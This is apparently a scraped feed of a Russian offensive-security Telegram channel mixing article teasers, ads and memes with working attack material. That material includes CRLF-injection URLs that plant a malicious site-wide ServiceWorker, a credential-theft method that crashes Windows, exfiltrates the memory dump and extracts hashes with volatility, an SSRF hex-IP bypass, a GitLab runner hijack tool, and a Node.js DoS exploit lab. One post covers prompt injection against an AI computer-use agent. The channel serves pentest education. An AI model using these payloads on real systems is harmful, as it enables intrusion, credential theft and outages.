Самые веселые баги можно найти там, где их никто не ждал, — например, в популярных решениях управления доступом, таких как FreeIPA. Представь: у нас есть возможность запросить важные данные из системы, казавшейся абсолютно защищенной. Что, если это не просто удача? Забегая вперед, скажу, что она привела меня к нескольким интереснейшим находкам.

🔓 Xakep

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Тут однозначно выиграл первый вариант)
Его и буду заказывать в ближайшее время

Мерч Похек на девушке
По запросу подписчиков)

Новый вариант мерча Похек. Как вам?)

У этого дизайна тоже есть своя мини история))

Пару фактов о международной кибербитве Standoff 14

🤜 Осенняя кибербитва пройдет 26-29 ноября.

👥 О своем участии на стороне атакующих заявили 60 команд из 26 стран: Вьетнама, Индии, Индонезии и Таиланда, стран Ближнего Востока, Африки и Латинской Америки. Расследовать их атаки будут команды защитников из России, Малайзии, Вьетнама, Индонезии, Бангладеш и Эфиопии.

💸 Призовой фонд для победителей — 50 тысяч долларов.

🎣 Будет организована эфирная студия аналитики (где мы с вами встретимся тоже 🌚), где каждый вечер будут подводиться итоги прошедшего дня.

🔓 Больше подробностей — на сайте кибербитвы (там же можно поставить напоминалку от трансляции).

Ладно, реально старый метод. Откупаюсь старым мемом
#meme

🌚 @poxek

🔺 Новый SSRF Bypass или как удивить коллегу под вечер
#dns #ssrf #bypass #hex

[ Оказалось способ древний, но я его увидел впервые :) ]

Все мы используем IPv4 ежедневно. Все мы используем IPv6 ежедневно. Но прямо сейчас меня удивил один парень из чата, открыв глаза, что DNS оказывается резолвит даже IP в Hex формате.

Hex IP — это представление IP-адреса в шестнадцатеричной системе. Обычно IP-адрес записывается в привычном формате с точками, например 192.168.0.1, где каждая часть — это десятичное значение байта (от 0 до 255). Однако этот же адрес можно представить в шестнадцатеричной системе.

Принцип работы:
IP-адрес состоит из 4 байтов, и каждый байт можно представить в шестнадцатеричном формате (от 00 до FF):

Десятичный IP 192.168.0.1 представлен в виде четырех байт: 192 (0xC0), 168 (0xA8), 0 (0x00), 1 (0x01).
Hex представление будет C0A801001.

Как преобразовать IP-адрес в шестнадцатеричный формат:

Возьмите каждый октет IP-адреса и переведите его в шестнадцатеричную систему.
Объедините эти значения в строку без точек.

Если вы введете URL вида http://0xC0A80001, браузер или сервер может интерпретировать это как запрос на http://192.168.0.1.

Для удобной конвертации можете использовать следующую команду:

printf '%02X' 192 168 0 1 ; echo

Получете следующий вывод: C0A80001, подставляем 0x - hex код

➡️Переходим http://0xC0A80001 и вау, оно срабатывает 😧

Собственно коллега по работе (это про тебя Андрей)), что это можно использовать при тестировании SSRF. Дальше сами фантазируйте)
Удивите и своих коллег, поделившись постом 🌝

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Практические варианты использования port knocking
#харденинг #ssh #ACL #fail2ban #администрирование

Существуют различные варианты попыток защиты\сокрытия сервисов от "любопытных глаз". Основные: использование нестандартного порта, fail2ban, ACL и tarpit (и их сочетание).
Есть ещё port knocking: как дополнительный фактор защиты - может снизить обнаружение сервиса, а не пытаться бороться с последствиями (брутфорс, эксплуатация), когда сервис уже обнаружен. Но, очень часто эта технология оказывается не используемой. Где-то из-за незнания технологии (хотя, статей хватает). Но, чаще из-за проблем на практике, которые мешают её внедрению:

➡️Читать тута

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

💻 Как мы докатились до Kubernetes и чем он заслужил любовь бизнеса
#k8s #kubernetes #контейнеры #container

Kubernetes сейчас массово используют в ЦОДах и облачных решениях. Какие заслуги у Кубера, что было до него и почему сейчас он едва ли не стандарт отрасли. А ещё, как понять, что Кубер вам ни к чему.

Сначала пятиминутка истории: как мы жили до появления Kubernetes. Когда-то серверные инфраструктуры основывались на концепции Bare Metal — физическом оборудовании, на котором выполнялись приложения. Такая архитектура позволяла чётко контролировать вычислительные ресурсы: количество ядер CPU, объём оперативной памяти и другие параметры можно было определять и наращивать напрямую, делая аппаратные апгрейды. Закон Мура работал на руку: рост производительности позволял постоянно повышать мощность без значительных затрат. При необходимости можно было создать настоящий кластер, объединяя серверы для эффективного распределения нагрузки и улучшенной работы с пользовательскими запросами.

➡️ Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Ну и раз я вспомнил что у меня есть Telegram канал - нужно запостить что-то полезное)

Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker.

Для регистрации ServiceWorker необходимо:
1) Иметь возможность выполнения JavaScript в контексте сайта
2) Наличие JavaScript файла на сервере с корректным Content-Type

Используя CRLF Injection оба этих условия легко выполняются:

XSS

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:20%0D%0A%0D%0A<script>XSS</script>

JS файл

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0AContent-Length:7%0D%0A%0D%0AJS_file

Но остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope.
То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно.

Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope.
Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта.

Для этого формируем код ServiceWorker с Service-Worker-Allowed:/, который подменяет все HTTP ответы на строку Fake response.

https://example.tld/some/path/foo/bar/?param=x%0D%0AService-Worker-Allowed:/%0D%0AContent-Type:text/javascript%0D%0AContent-Length:162%0D%0A%0D%0Aself.addEventListener(%22fetch%22,function(event){event.respondWith(new%20Response(%22Fake%20response%22,{status:200,statusText:%22OK%22,headers:{%22Content-Type%22:%22text/html%22}}))})

И подключаем его через XSS.

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:378%0D%0A%0D%0A%3Cscript%3Enavigator.serviceWorker.register('/some/path/foo/bar/?param=x%250D%250AService-Worker-Allowed:/%250D%250AContent-Type:text/javascript%250D%250AContent-Length:162%250D%250A%250D%250Aself.addEventListener(%2522fetch%2522,function(event){event.respondWith(new%2520Response(%2522Fake%2520response%2522,{status:200,statusText:%2522OK%2522,headers:{%2522Content-Type%2522:%2522text/html%2522}}))})',{scope:'/'})%3C/script%3E

Также иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0ATransfer-Encoding:chunked%0D%0A%0D%0A7%0D%0AJS_file%0D%0A0%0D%0A%0D%0A

IaC и DevSecOps: выбираем лучшие инструменты анализа и защиты инфраструктурного кода
#IaC #DevSecOps #appsec #безопаснаяразработка

Сегодня мы вновь будем говорить об особенностях статического сканирования, но на этот раз переключим фокус с программного кода на код инфраструктурный.

Частично этот вопрос обсуждался в статье про безопасность контейнеризированных приложений в DevSecOps. В этой статье будут рассмотрены краткие теоретические сведения о подходе “Инфрастуркутра как кодˮ, место безопасности IaC в цикле DevSecOps, методы статического анализа конфигурационных файлов и ключевые особенности работы с инструментом KICS.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🐞 Методология баг-баунти: гайд для охотников за багами
#bugbounty #дляначинающих #meme

Эта статья основана на моем опыте веб-хакера, но описанные в ней принципы в целом применимы ко всем дисциплинам хакинга. В основном она предназначена для начинающих хакеров и для людей, которые уже нашли несколько багов, но хотят сделать свой подход к баг-баунти более последовательным и систематичным.

Об авторе: я Киаран (или Monke). Я ирландец, но живу в Эдинбурге. Занимаюсь баг-баунти уже примерно четыре года, участвовал в четырех мероприятиях Live Hacking Event на разных платформах, скоро будет пятое. Я довольно типичный веб-хакер, сейчас мне больше всего нравится заниматься хакингом на стороне клиента. В этом году я наконец полностью перешел на зарабатывание денег при помощи баг-баунти и основал компанию Simian Security. Возможно, я единственный ирландец, для которого баг-баунти является полноценной работой.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🗣Внимание, конкурс!

Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от The Linux Foundation. Ваучеры дают 100% скидку до 31.10.2025 — и мы хотим ими поделиться:

🟣 Каталог электронных курсов и сертификации

Их можно применить к любому:

— онлайн-курсу
— сертификационному экзамену
— или пакету (курс + сертификация)

🤝 CKA, CKS, CKAD и другие — в комплекте!

Условия розыгрыша просты: 🔵 Подпишитесь на KazDevOps и нажмите "участвую" под этим постом.

🚩 14 ноября подведем итоги и выберем 7 победителей. Каждый получит по ваучеру. Активировать ваучеры нужно до 31.10.2025. После этого у вас будет 1 год и 2 попытки, чтобы завершить обучение и/или сдать экзамен.

Go-go-go, и успехов!

#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf

@DevOpsKaz 😛

Ключ от всех дверей: как нашли бэкдор в самых надежных* картах доступа
#nfc #rfid #СКУД

Вы прикладываете ключ-карту к считывателю, и дверь офиса открывается. Но что, если такой пропуск может взломать и скопировать любой желающий?

В 2020 году Shanghai Fudan Microelectronics выпустила новые смарт-карты FM11RF08S. Производитель заявил об их полной защищенности от всех известных методов взлома. Группа исследователей проверила эти заявления и обнаружила встроенный бэкдор, позволяющий получить полный доступ к данным карты.

P.S. ребята старались писать статью, обязательно ставьте +rep

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Nuclei Fu
#nuclei #projectdiscovery #DAST

В сегодняшней статье речь пойдет о Nuclei — это мощный open-source инструмент для поиска уязвимостей (DAST), который активно развивается благодаря поддержке сообщества.
Доклад «Nuclei Fu» был впервые представлен экспертами СайберОК – Станиславом Савченко и Андреем Сикорским – на самой масштабной в Центральной Азии хакерской конференции KazHackStan, проходившей 11-13 сентября.

Посмотреть доклад: здесь
Посмотреть презентацию к докладу: здесь

За последний год в Nuclei было несколько крупных обновлений, которые принесли множество фич, таких как кодовая вставка, использование javascript в шаблонах, управление запросами через flow, внедрение подписи шаблонов и пр. Сегодня хотелось бы рассказать о возможных атаках на Nuclei, а именно о клиентских атаках, которые стали доступны благодаря этим нововведениям.

Далее рассказ буду вести в контексте двух сторон – Алисы, которая хочет защитить свой веб-сервер от сканирования Nuclei, и Боба, который, собственно, и запускает Nuclei.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

первая тысяча людей в чате)

Заходите, если не знали о чате ранее. Всегда активные беседы)

🌚 @poxek_chat

Удобная подача списка url в shortscan по очереди
#shortscan #IIS #microsoft #заметка

cat IIS.txt | xargs -I@ sh -c 'shortscan @'

P.S. в целом любую тулзу можно так завернуть, если разработчик не сделал функционал указания файла, как входных данных, а можно и PR ему отправить 😉

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Увеличиваем Attack Surface на пентесте периметра
#recon #разведка #хабр

Типичная проблема: компании часто сами не подозревают, какие ресурсы у них могут «торчать наружу». А раз их может нарыть потенциальный злоумышленник — это проблема. На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях нам, пентестерам, приходится recon-ить все ресурсы компании. Ну и конечно же, чем больше скоуп, тем больше Attack Surface, тем больше потенциальных файндингов, в итоге — больше вероятность пробива периметра.

❗️ Важный тезис - нет серебряной пули, который сделает разведку универсальной. Когда-нибудь вы наткнетесь на скоуп, который не будет поддаваться wildcard фильтрации или поддоменов пассивно не собирается, активно только брутить и вы в итоге много поддоменов пропустите и это НОРМАЛЬНО. Постройте базу для разведку, но всегда проходитесь руками

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Hello, this is Telegram Support.

bytescare.com made a complaint https://t.me/poxek is infringing on their copyright.

We kindly ask you to contact the copyright holder via email [email protected] to resolve the matter.

второй раунд

Можно поздравить с успешной регистрацией))

А какой сегодня ты?

💀 Windows | Get passwords no one notices 🔑

- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)

🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
C:\Windows\MEMORY.DMP file
- So, be the root cause of BSoD — crash the system

🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate C:\WIndows\MEMORY.DMP
3️⃣Launch volatility

py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump

⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP

> Read the full post (more techniques, nuances, detection, hardening)

#redteam #blueteam #credential_access

Abusing GitLab Runners
#gitlab #devsecops

Не самая новая техника hijack'а других gitlab runner'ов, но тем не менее эффективная, если вы получаете доступ к gitlab и/или токен раннера. В этой статье автор хотел бы объяснить, что такое Runners, как они работают и как вы можете использовать их во время пентестов.

➡️Research

➡️Github PoC

Использование:

usage: hijack-runner.py [-h] [--target TARGET] [--register REGISTER] [--attack ATTACK] [--tag TAG]
                        [--clone]

Abuse GitLab Runners

optional arguments:
  -h, --help           show this help message and exit
  --target TARGET      The GitLab instance to target
  --register REGISTER  Register a token
  --attack ATTACK      Use Runner token to steal data
  --tag TAG            Taglist separated with commas
  --clone              Will clone the repo locally

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

ZombAI: промпт-инъекция в Claude Computer Use
#ai #claude #c2 #sliver

Несколько дней назад Anthropic выпустила Claude Computer Use, который представляет собой модель + код, позволяющий ИИ управлять компьютером. Он делает скриншоты для принятия решений, может выполнять команды bash и так далее.

Это круто, но, очевидно, несёт и массу рисков, ведь Claude Computer Use позволяет искусственному интеллекту автономно выполнять команды на машинах. А значит, можно использовать промпт‑инъекции (prompt injection).

➡️Читать далее

P.S. респект за крутую пикчу

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Filesystem race condition. Незапланированное решение задачи на Кубке CTF 2024
#race_condition #CTF #pwn

В статье рассмотрим нестандартное решение задания на бинарную эксплуатацию – “R4v5h4n N Dj4m5hu7” и обойдем проверку реального пути к файлу. Статья написана моими хорошими знакомыми, они крутые CTFеры! В статье очень подробно, технично и со скринами разобрана таска.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

90 дней тестировали BitNinja — коробочное решение для защиты сервера и сайта. Рассказываем кто, откуда и что атакует
#BitNinja #wordpress #fix #honeypot #WAF #firewall

BitNinja — это аналог Dr.Web или Immunify, но в отличие от них специализируется не только на ловле вирусов, но и фильтрации входящего трафика. Для работы антивируса задействует AI, а управлять защитой всех серверов можно из одного окна.
Когда мы только начали предоставлять BitNinja, появилась разумная идея, что неплохо бы протестировать его самостоятельно.

Тестирование BitNinja мы разделили на три фазы.
➡️Пассивное — просто размещаем BitNinja на серверах с разной конфигурацией и смотрим, на какие активности он реагирует.
➡️Активное — идем по публичной документации вендора и тестируем с помощью симуляции атак.
➡️Приближенное к реальности — за BitNinja размещается какой-то реальный код, который пентестеры пытаются вскрыть.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Архитектура и основы безопасности Zigbee
#умныйдом #IoT #zigbee

Представьте себе дом, где лампочки сами включаются, когда вы входите, а термостат автоматически регулирует температуру. Это реальность, которую предлагает Zigbee - беспроводная сеть, незаметно управляющая умными устройствами в вашем доме.

Но как работает эта невидимая "нить"? И насколько это безопасно? В этой статье рассмотрим основные концепции Zigbee, его архитектуру и технологические характеристики, а также погрузимся в главные механизмы обеспечения его безопасности.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🐈 Опрос. Посты на какие темы вы хотите прочитать? Пишите в комментариях

«Где хуже всего оставлять свои секреты?» — что происходит с учетными данными AWS, которые плохо лежат
#aws #cloud #секреты

Автор разместил в различных общедоступных онлайн-сервисах canary-токены, регистрируя все попытки доступа, и обнаружил интригующие закономерности в методах атак киберпреступников и в том, как они прочесывают сеть в поисках чужих учетных данных.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Заявление о регистрации канала подано

⚡️ Началось: открылась форма для регистрации владельцев каналов и страниц в соцсетях, у которых больше 10 тысяч подписчиков.

Напомним: если у вас есть страничка в Telegram, Likee, TikTok, Twitter, YouTube, «ВКонтакте», «Одноклассники», LiveJournal, «Пикабу», Pinterest, Rutube, «Дзен», Twitch, Discord или Yappy — вы обязаны зарегистрироваться.

Санкции: если забить на регистрацию — вам запретят собирать донаты и продавать рекламу.

Что делать: подать данные о себе и канале через специальную форму. Затем в течение 3 дней (это важно!) нужно разместить в закреплённом сообщении или описании канала уникальный номер заявки, чтобы в РКН могли убедиться, что вы действительно владелец этой страницы.

После включения в перечень РКН пришлёт уникальную ссылку для размещения в профиле канала.

@exploitex

Улучшаем безопасность ваших CI/CD через Shared Docker executor и OPA-плагин
#docker #k8s #kubernetes #CICD #контейнеры #containers

На связи команда безопасности Платформы в лице её тимлида Букина Владимира. Основная задача нашей команды — защита CI/CD и, в частности, GitLab с K8s. Дальше я расскажу вам о том, как мы внедряли, поддерживаем и улучшаем наш плагин авторизации для Docker socket.

Так сложилось в нашей индустрии, что ИБ всегда догоняет технологии, которые внедрили в IT. При внедрении технологии всплывают всевозможные риски, о которых не успели подумать при разработке. Для мира ИБ Docker и K8s — ещё совсем свежие технологии. Исследований не так много. Всё ещё куча уязвимостей (в том числе и необнаруженных), и поэтому поработать с ними особенно интересно.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

💀 Подкасты, подкасты, подкасты. А они вам ещё не надоели? Я уверен, что нет
#подкаст

Тем более когда тебе пишет Рома Панин и говорит: "Зацени, какой подкаст прикольный мы сняли".

Посмотрел спикеров на сайте, думал чёт душное будет. Но сразу после превью, увидел как ребята одеты и понял, что сейчас будет что-то очень интересное))

В итоге я посмотрел весь подкаст и что могу сказать? Мне очень понравилось. Мемно, полезно, в шоу был таролог, а Рома рассказывал свои кул стори, как тролилл телефонных мошенников.

Было пару тем, которые недораскрыли, но как говорится задел чтобы позвать меня на будущее)

Оставлю 📹 ТУТ ССЫЛКУ и 📺 VK Видео для тех кого заинтересовало)

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Почту на прокачку: повышаем защиту MS Exchange
#microsoft #exchange #windows #fix

Автор статьи Павел Маслов, архитектор дирекции инфраструктурных проектов Positive Technologies. Не так давно его коллега Артем Мелехин уже рассказывал на Хабре о сути нашего подхода к харденингу ИТ-инфраструктуры. Сегодня же они поговорят об укреплении киберустойчивости программных средств на конкретном примере — параметрах почтовой системы Microsoft Exchange (MS Exchange).

Начать хочется с небольшой истории, которая и подтолкнула меня к написанию этой статьи. Недавно к нам за консультацией обратились ИТ-специалисты одной крупной компании с государственным участием, назовем ее N. Вопрос касался работы их корпоративной почты на базе MS Exchange, а точнее конкретного письма. Дело в том, что генеральный директор их контрагента получил e-mail от имени руководителя N с просьбой поделиться конфиденциальной информацией. Как вы уже догадались, никакого сообщения с подобным запросом он не отправлял. Чем закончилась эта история и как не повторить судьбу наших героев, читайте под катом.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Прими участие в «Хакатоне по кибериммунной разработке 3.0» от «Лаборатории Касперского» с призовым фондом 1 000 000 рублей!

Регистрация на хакатон открыта до 15 ноября

Приглашаем разработчиков, аналитиков, архитекторов ПО, экспертов по информационной безопасности и студентов программирования и кибербезопасности. Участвуй индивидуально или в команде до 5 человек.

Тебе предстоит разработать систему удалённого управления автомобилем для каршеринга, устойчивую к кибератакам. Специальных знаний в автомобильной отрасли не требуется — задача будет понятна всем, независимо от опыта.

Это твой шанс прокачать навыки в кибербезопасности и пообщаться с экспертами «Лаборатории Касперского».

Ключевые даты:
• 15 октября – 15 ноября – регистрация участников
• 8 ноября – митап с экспертами и игра «Огнеборец»
• 15 ноября – старт хакатона
• 17 ноября – дедлайн загрузки решений
• 22 ноября – подведение итогов и объявление победителей

Регистрируйся, прояви себя и внеси вклад в безопасность каршеринговых сервисов

⚡️Кому и зачем нужна безопасная разработка, и что необходимо для запуска подхода DevSecOps в организации?

Обсудили эту актуальную тему в свежем выпуске подкаста «Безопасный выход». Вместе с Ильей Шмаковым, BISO и DevSecOps TeamLead в Росбанке, разобрали распространение DevSecOps, его адаптацию и внедрение в процесс разработки в отечественных компаниях.

Смотрите подкаст и вы узнаете:

• что драйвит внедрение DevSecOps, и как посчитать его эффективность;
• какой нужен MVP для запуска процессов безопасной разработки;
• кто может стать DevSecOps, и где готовят таких специалистов;
• кто такие Security Champion, и как их вырастить среди своих разработчиков;
• каковы перспективы развития безопасной разработки в России.

💬VK Видео

📱Rutube

📹YouTube

🎼Podster

Подписывайтесь на подкаст, чтобы не пропустить новые выпуски! #подкаст #Безопасныйвыход

Как выглядит мобильный пентест в команде
#meme

🌚 @poxek

Гарда, спасибо вам большое! Отлично провел день. Большое спасибо отличную организацию, хорошие подарки для спикеров и очень дружественную атмосферу)

На последних фотках, это гости учавствовали в хакатоне

🌚 @poxek

Сохранить Всё от Гарда

➡️https://saveall.garda.ai/

🌚 @poxek

Сегодня буду на ивенте Сохранить Всё от Гарда

➡️https://saveall.garda.ai/

🌚 @poxek

😆 Анонсируем BUGS ZONE 3.0!

Наш приватный ивент BUGS ZONE возвращается. Традиционно обещаем сочный скоуп, приятные призы и офлайн-тусовку с топами нашей платформы.

Вас ждут:

🔵онлайн-этап с хантингом на закрытом скоупе;
🔵церемония награждения с приватной вечеринкой;
🔵много нового опыта, общения и приятных бонусов.

Ивент будет проходить с начала ноября, а церемония награждения состоится 22 ноября в Москве, так что букайте календари и ничего не планируйте :)

Скоро мы разошлем приглашения нашим самым крутым исследователям. Но у вас еще есть шанс попасть в элитный список участников BUGS ZONE 3.0!

Для этого активно сдавайте баги на нашей платформе и качайте рейтинг. Мы обязательно вас заметим и придем с приглашением.

А еще мы разыграем несколько проходок на церемонию награждения. Это отличная возможность пообщаться с крутыми экспертами в неформальной обстановке. Розыгрыш начнем чуть позже, следите за уведомлениями на канале.

💻 Popping Android Vulnerabilities From Notification to WebView XSS
#en #android #mobile #xss #webview

Если вы всегда думали, что взлом Android-приложений сводится лишь к обходу проверки на root, SSL pinning'а или проксирования HTTP-запросов через Burp Suite для выявления уязвимостей в серверной части, возможно, пришло время изменить своё мышление. Хотя эти шаги действительно полезны, но они не раскрывают сущности всех уязвимостей Android-приложений. Автор, глубоко погрузившийся в безопасность мобильных приложений, может сказать, что настоящие уязвимости часто скрываются в самом Java-коде Android, а не только в API серверной части.

В этой статье автор покажет вам пример вредоносной отправки расширенного уведомления, которое приводит к XSS-уязвимости при обработке в WebView. Это яркий пример того, как понимание внутренних механизмов Android-приложений может помочь обнаружить значимые уязвимости, которые в противном случае могли бы остаться незамеченными.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

©️ Staffcop — лидер рынка расследования инцидентов внутренней информационной безопасности представляет ключевое обновление года. Релиз Staffcop Enterprise 5.5: эволюция внутренней безопасности.

🔴 Ключевое нововведение версии 5.5 — продвинутый анализ рисков, позволяющий администраторам системы не только фиксировать потенциальные инциденты, но и оценивать их критичность для более оперативного реагирования на реальные угрозы.

Что еще вас ждет в новой сборке продукта:
▶️ Анализ рисков
▶️ Централизованная установка меток
▶️ Перехват командной строки
▶️ Учет активности в ВКС
▶️ Перехват в RDP

Добавляя новый функционал, разработчики не забывают улучшать ключевые функции для более глубокого мониторинга событий и инцидентов ИБ.

🕑 30 октября в 11:00 МСК топ-менеджеры Staffcop в прямом эфире проведут презентацию новой версии продукта. Для участников вебинара приготовлены пасхалки, за разгадку которых можно выиграть ЛИМИТИРОВАННЫЙ релизный мерч от Staffcop.

👤 Регистрируйтесь уже сейчас и не упустите возможность узнать все детали из первых уст и задать все волнующие вопросы в прямом эфире!

➡️ Ссылка на регистрацию

Реклама. ООО «АТОМ БЕЗОПАСНОСТЬ»,  ИНН 5408298569 , ОГРН 1125476195459 erid:2SDnjbq3DpX

От машинного обучения к вопросам безопасности ИИ. Борис Захир - Борис_ь с ml
#подкаст #podcast #борис_ь

❗️ Подкаст выходит на новый уровень и теперь его можно слушать прямо в Telegram!
❗️ Слушать здесь

У меня в гостях Борис Захир, админ телеграм канала Борис_ь с ml. Канала где вы сможете вдохновиться изучением ML, ИИ, а также российского законодательства в области нейросетей.

Подкаст будет интересен:
Исследователям в области ИИ
Владельцам бизнеса, которые собираются внедрять или защищать ИИ
Всем, кто хочет узнать больше о безопасности ИИ

В этом подкасте мы обсудили:
Развитие от ML к AI
Научные исследование ИИ
Исследование рынка ИИ
Кибербезопасность в ИИ
ИИ в кибербезопасности

➡️ Ссылки
💬 Подкасты в Telegram
📹 YouTube
📺 RuTube
💙 VK Видео
🎵 Apple Podcasts
🎵 Яндекс.Музыка
☕️ Mave
💬 Канал Борис_ь с ml

Обязательно смотрите до конца!

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

Защита данных — твоя суперсила? Тогда должность AppSec Engineer в «Киберпротекте» ждет тебя!

Привет! Мы — «Киберпротект», российская аккредитованная ИТ-компания. Разрабатываем решения, которые делают кибермир безопаснее и уютнее для всех! Наша миссия — не просто защищать, а строить безопасное кибербудущее.

⭐️ Сейчас мы ищем талантливого AppSec Engineer, которому предстоит:
• разгадывать тайны кода: статический и динамическим анализ — твоя сильная сторона кода;
• охотиться на уязвимости — вручную или автоматически;
• проводить фаззинг-тестирование;
• анализировать отчеты, зависимости и устранять CVE — твоя логика и внимание выше всех похвал!
• определять и контролировать изменения в поверхности атаки продукта;
• обеспечивать покрытие модульными тестами объектов безопасности.

💎 Наш идеальный кандидат:
• имеет опыт работы AppSec от 1 года и более;
• уверенно владеет языком C;
• отлично знает Linux (RHEL-based).
Знание AFL++, addrsanitizer, valgrind, libfuzzer, statsviz, GO будет плюсом.

Мы предлагаем
• Трудоустройство по ТК РФ с первого дня, официальную зарплату, которая растет вместе с тобой
• Уютный офис в БЦ ФизТехПарк, гибрид или удаленка — выбирай сам! Есть релокационный бонус
• ДМС со стоматологией, страхование от несчастных случаев
• Компенсация занятий спортом и питания — поддержим твой активный образ жизни
• Профессиональный рост — внутреннее и внешнее обучение, чтобы помочь друг другу покорять новые высоты

⭐️ Если тебе откликается, давай знакомиться! Оффер уже готов. Приходи на собеседование и жди результата!

Для отклика пиши Дарье или переходи на вакансию по ссылке.

#вакансия

NodeJS DOS с помощью битых HTTP/2 фреймов (CVE-2024-27983)
#nodejs #js #dos #http2 #CVE

Node.js сервер может быть положен на лопатки с помощью специального набора HTTP/2 фреймов. Уязвимость возникает, когда злоумышленник отправляет HTTP/2 фреймы, содержащие фреймы CONTINUATION, после чего внезапно завершает TCP-соединение. Это вызывает состояние гонки (race condition) в памяти библиотеки nghttp2, оставляя необработанные данные в памяти. Конкретно проблема возникает при обработке HTTP заголовков в момент закрытия соединения, что провоцирует сбой работы сессии HTTP/2.

😵 Проблема касается всех версий Node.js: 18.x, 20.x и 21.x.

🖥 Security Release

📱 Github PoC (а также в комментариях выложил сбилдженный эксплойт)

😈 HackerOne Отчёт

Также есть лаба, которую вы можете поднять себе в контейнере и потренироваться
📱 Github Лаба

Убедитесь, что у вас стоит docker. Запуск:

git clone https://github.com/lirantal/CVE-2024-27983-nodejs-http2.git ; cd CVE-2024-27983-nodejs-http2 ; chmod u+x ./start.sh ;./start.sh

➡️Советую почитать подробнее про HTTP/2 CONTINUATION Flood

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

кстати каналу 3 года вчера исполнилось, юхууу

я бы написал результаты ребрендинга за год, но пока нет желания. Попозже сделаю)

🛠 LLaMator: Red Teaming фреймворк для тестирования уязвимостей LLM
#LLM #red_team

В этом материале мы, команда LLaMaстеры — студенты 1 курса магистратуры ИТМО AI Talent Hub, представляем фреймворк LLaMator, победивший на хакатоне AI Product Hack в кейсе от компании Raft. Наша задача — создать инструмент для тестирования уязвимостей интеллектуальных систем, например, чат-бота для консультирования клиентов автосалона, на базе больших языковых моделей (LLM).

Сегодня интеллектуальные помощники внедряются повсеместно, делая нашу жизнь удобнее и более эффективной. Однако это также создаёт новые угрозы безопасности, поскольку такие системы могут быть уязвимы к атакам со стороны злоумышленников. Важно регулярно проверять их устойчивость к возможным атакам.

На рынке уже существуют решения для автоматизированной проверки LLM, например, Garak, PyRIT и Giskard, но они нацелены непосредственно на тестирование генеративных моделей и не учитывают региональную специфику. Наша команда решила сосредоточиться на проверке русскоязычных чат-ботов, которые базируются на больших языковых моделях.

➡️ Читать далее

📱 Github

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

🔺 Анализ уязвимости CVE-2024-38227 в Microsoft SharePoint 🔺
#bizone #windows #microsoft #sharepoint

